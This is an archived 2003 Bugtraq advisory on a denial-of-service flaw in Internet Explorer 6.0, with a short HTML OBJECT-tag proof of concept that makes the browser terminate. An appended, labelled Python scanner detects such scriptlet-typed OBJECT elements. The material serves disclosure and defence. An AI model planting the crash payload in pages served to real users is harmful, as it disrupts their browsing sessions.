----- Original Message -----
From: "Ryan Emerle" <securityFocus@emerle.net>
To: <bugtraq@securityfocus.com>
Sent: Wednesday, April 16, 2003 11:55 AM
Subject: Exploit/DoS in MS Internet Explorer 6.0 (OBJECT Tag)

>
> *Description*
> Microsoft Internet Explorer 6.0 (other versions not tested) is vulnerable
> to a DoS when specially crafted html is present on a page. The
> vulnerability is in the processing of the OBJECT tag.
>
> *Tested*
> OS: Windows 2000 Pro SP3 (fully up-to-date)
> IE: Internet Explorer 6.0.2800.1160 SP1
>
> *Ramifications*
> When the specially crafted HTML is present in a page, Internet Explorer
> will forcefully terminate all open sessions. The client machine is
> otherwise unharmed. Further ramifications have not been investigated.
>
> *Proof of Concept*
> The following HTML code will cause the above version of Internet Explorer
> to forcefully terminate:
>
> <object id="test"
>   data="#"
>   width="100%" height="100%"
>   type="text/x-scriptlet"
>   VIEWASTEXT></object>
>
> --
> Ryan Emerle, BSCS
> Lead Systems Developer
> Interactive Network Systems, Inc.
> http://www.ins-business.com
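
An added example, not part of the original post: a small scanner a defender could run over stored or proxied HTML to report OBJECT elements declared as `text/x-scriptlet`, flagging those whose `data` attribute is only a fragment, as in the proof of concept above. The class and function names, the `fragment_only_data` field, and the sample page are constructed for illustration.

```python
from html.parser import HTMLParser

SCRIPTLET_TYPE = "text/x-scriptlet"  # MIME type used in the advisory's proof of concept


class ScriptletObjectFinder(HTMLParser):
    """Collect OBJECT elements whose type attribute declares a scriptlet."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names, so <OBJECT TYPE=...> matches too.
        if tag != "object":
            return
        # Valueless attributes such as VIEWASTEXT arrive with value None.
        a = {name: (value or "") for name, value in attrs}
        mime = a.get("type", "").split(";")[0].strip().lower()
        if mime != SCRIPTLET_TYPE:
            return
        data = a.get("data", "").strip()
        line, _col = self.getpos()  # position of the start of the tag
        self.findings.append({
            "line": line,
            "id": a.get("id", ""),
            "data": data,
            # Same attribute shape as the advisory: data is only "#" or "#fragment".
            "fragment_only_data": data.startswith("#"),
        })


def find_scriptlet_objects(html_text):
    """Return one finding per scriptlet-typed OBJECT element in html_text."""
    finder = ScriptletObjectFinder()
    finder.feed(html_text)
    finder.close()
    return finder.findings


# Constructed sample page: one unrelated OBJECT, one with the advisory's attributes.
SAMPLE_PAGE = """<html><body>
<object type="image/svg+xml" data="logo.svg"></object>
<p>text</p>
<OBJECT ID="test"
        DATA="#"
        TYPE="Text/X-Scriptlet"
        VIEWASTEXT></OBJECT>
</body></html>
"""

if __name__ == "__main__":
    for finding in find_scriptlet_objects(SAMPLE_PAGE):
        print(finding)
```
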